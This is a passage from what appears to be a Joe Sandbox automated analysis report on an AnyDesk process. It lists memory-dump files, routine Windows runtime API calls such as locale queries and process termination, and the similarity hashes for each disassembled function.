                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Resource$LoadLockSizeof
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2853612939-0
                                                                                                                                                                                                                                                  • Opcode ID: d242ca1d5fd52857a0c9baced8091a62c50dde5c61b9eaed01bf37feb48d38b5
                                                                                                                                                                                                                                                  • Instruction ID: 4cc1eff97534192a909abda9397b7fbba18d424d380e4c96bf33b063c3aebfcc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d242ca1d5fd52857a0c9baced8091a62c50dde5c61b9eaed01bf37feb48d38b5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68F0C836901235ABDF311F65E95449A7BB9EF463517008826FD59D7034F631E852D7C0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(69C21DE7,?,69C49E40,69C21DE7,69C7B670,0000000C,69C49F88,69C21DE7,00000002,00000000,?,69C45DF9,00000003,?,69C3FA3A,69C3FA7E), ref: 69C49E8B
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,69C49E40,69C21DE7,69C7B670,0000000C,69C49F88,69C21DE7,00000002,00000000,?,69C45DF9,00000003,?,69C3FA3A,69C3FA7E), ref: 69C49E92
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 69C49EA4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                  • Opcode ID: a2fe2388c1f6692f336c87e1cc416bf4f857a2acb361f3ae451cee51e5eb3a4d
                                                                                                                                                                                                                                                  • Instruction ID: a2b4eebf59393729abc3e8973b1019e920b8d98bd3e9e9bf27280a52c238138b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2fe2388c1f6692f336c87e1cc416bf4f857a2acb361f3ae451cee51e5eb3a4d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FE046321006A8AFCF01AF61DA08AA93B79EB85B95B104424F8098A020DB35D843DB80
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 69C416A4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2325560087-3916222277
                                                                                                                                                                                                                                                  • Opcode ID: 9cb188435df57f47b62d98e2d035c99d1da42347d62eab8fb4841983b601f6f4
                                                                                                                                                                                                                                                  • Instruction ID: eac84bbe46a63821a8e7db53339751663b3abb56a7741ba794796a2f0b47777f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cb188435df57f47b62d98e2d035c99d1da42347d62eab8fb4841983b601f6f4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9451AFB1E002198FEF04CF6AE4927AEBBF4FB08714F10852AD855EB280E7749461CF91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 69C5ADD0
                                                                                                                                                                                                                                                    • Part of subcall function 69C46183: IsProcessorFeaturePresent.KERNEL32(00000017,69C46155,0000010C,00000000,00000000,00000000,00000000,00000000,?,?,69C46175,00000000,00000000,00000000,00000000,00000000), ref: 69C46185
                                                                                                                                                                                                                                                    • Part of subcall function 69C46183: GetCurrentProcess.KERNEL32(C0000417,00000000,0000010C,69C322CA), ref: 69C461A7
                                                                                                                                                                                                                                                    • Part of subcall function 69C46183: TerminateProcess.KERNEL32(00000000), ref: 69C461AE
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FC0F
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC1C
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 69C5AF11
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$Process_free$CodeCurrentFeatureInfoLocalePagePresentProcessorTerminateValid_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3156739809-0
                                                                                                                                                                                                                                                  • Opcode ID: 253eec1b7daa80d711c47aa827c3ea1ad9db1d5989c7edcb15dedbe8c8838c4d
                                                                                                                                                                                                                                                  • Instruction ID: 9cada54d5f831aaf5d1909e35ac655dfaf9ea2a573888d1375164c63cd7ca743
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 253eec1b7daa80d711c47aa827c3ea1ad9db1d5989c7edcb15dedbe8c8838c4d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D451E636700205AAE715EA76FC45FB773A8EF85774F008529A916DB180FB70E83187B9
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FC0F
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC1C
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 69C5B37D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1663032902-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FC0F
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC1C
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 69C5AF11
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1663032902-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(69C5B0D9,00000001), ref: 69C5B023
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1084509184-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,69C5B2F7,00000000,00000000,?), ref: 69C5B585
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2692324296-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(69C5B329,00000001), ref: 69C5B098
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1084509184-0
                                                                                                                                                                                                                                                  • Opcode ID: ee0714b982d332cadc5996705f9dbd42ecfa4b3b7447e9f43b79dcce27fe8a30
                                                                                                                                                                                                                                                  • Instruction ID: b8f461d50a46892d5a5df8d0baa5dbdd611f7ad3cf97292ff258db6de270e98a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee0714b982d332cadc5996705f9dbd42ecfa4b3b7447e9f43b79dcce27fe8a30
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8F022762003055FD7148E3AE991A7A7FA5EFC1368F44842DE9028B640E7719822C644
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4B688: EnterCriticalSection.KERNEL32(?,?,69C4B4E9,00000000,69C7B718,0000000C,69C3F041,?,69C40906,?,?,69C31BDD,0000012C), ref: 69C4B697
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(69C4EBF0,00000001,69C7B8B8,0000000C), ref: 69C4EC6E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                                                                                                  • Opcode ID: 70a1a6973db624ebf6de80e3ae2f6f193c4d06ccda6f1d88da1567f902254d6c
                                                                                                                                                                                                                                                  • Instruction ID: 69868d08a5c580967c2b5351f34cc50dc1cb5e7b088565517925deb40657316e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70a1a6973db624ebf6de80e3ae2f6f193c4d06ccda6f1d88da1567f902254d6c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CF03736A10214DFDB14DF68D404BAD3BB0EB05724F51D11AF810DF290EB348A428F86
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 481472006-0
                                                                                                                                                                                                                                                  • Opcode ID: f322af12d1a828829cff4222591d16af9ee1c0feb2f8c234e6c354ee71648917
                                                                                                                                                                                                                                                  • Instruction ID: 42d6799ccf4618e6224298088dbe56d631f5420a8a8fc0739c3f238780233c7e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f322af12d1a828829cff4222591d16af9ee1c0feb2f8c234e6c354ee71648917
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EF0F038D0011ED7CF08EF99C9117FEB7B8AF29705F80403AA802EA640E7388A51D3A5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,?,?,?,69C51EFE,?,20001004,?,00000002,?), ref: 69C4F19D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                  • Opcode ID: a3cd16943c6fe0efd4f8908d61c2a96b937534f51f198e32e6c52121e26383bd
                                                                                                                                                                                                                                                  • Instruction ID: 72c24aac7921f08445f46e673fe6d1fedeaf120f8e8e84afb51e34d84f733424
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3cd16943c6fe0efd4f8908d61c2a96b937534f51f198e32e6c52121e26383bd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27F05E39641268EFCF129F21EC00A6E7B65EF49B10F408015FC0556210DB329E11EA95
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(Function_0003AEBD,00000001), ref: 69C5AF9D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1084509184-0
                                                                                                                                                                                                                                                  • Opcode ID: c976b867ef68ddeb0d00448ff9d0845c64af06267d2cee0ff4ae14a5382ff0d8
                                                                                                                                                                                                                                                  • Instruction ID: 6c40ae05b1694c7d9fcf12b5a47f5c1bb2cfa33a4b57b929d7ae9637bf96cb7a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c976b867ef68ddeb0d00448ff9d0845c64af06267d2cee0ff4ae14a5382ff0d8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14F0553A30020957CB049F3AE955B6A7FA4EFC2764B064058EA068B680D7359863C7A0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

